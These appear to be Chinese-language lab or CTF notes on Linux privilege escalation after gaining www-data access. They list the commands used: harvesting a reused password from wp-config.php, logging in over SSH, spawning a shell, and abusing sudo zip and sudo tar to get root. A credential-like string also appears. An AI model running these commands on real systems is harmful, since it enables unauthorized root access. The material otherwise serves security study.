web安全提权
提权介绍
根据之前得到www-data权限,准备进行提权:
内核漏洞提权
明文root密码提权
计划任务
密码复用
sudo -l
cd /home
cd zico
ls -alh(发现ssh隐藏文件,wordpress)
cd wordpress(挖掘配置文件,发现wp-config.php)
cat wp-config.php(密码复用)
ssh zico@ip(远程登陆)
sWfCsfJSPV9H3AmQzw8
python -c "import pty;pty.spawn('/bin/bash')"
sudo -l(提权提示)
ssh如果出现类似的警告:使用后面的处理办法。
mv /root/.ssh/known_hosts /tmp
之后再次使用ssh登陆即可正常使用了。
//利用zip进行提权
touch exploit
sudo -u root zip exploit.zip exploit -T --unzip-command="sh -c /bin/bash"
//利用tar进行提权
sudo -u root tar cf /dev/null exploit -checkpoint=1 --checkpoint-action="/bin/bash"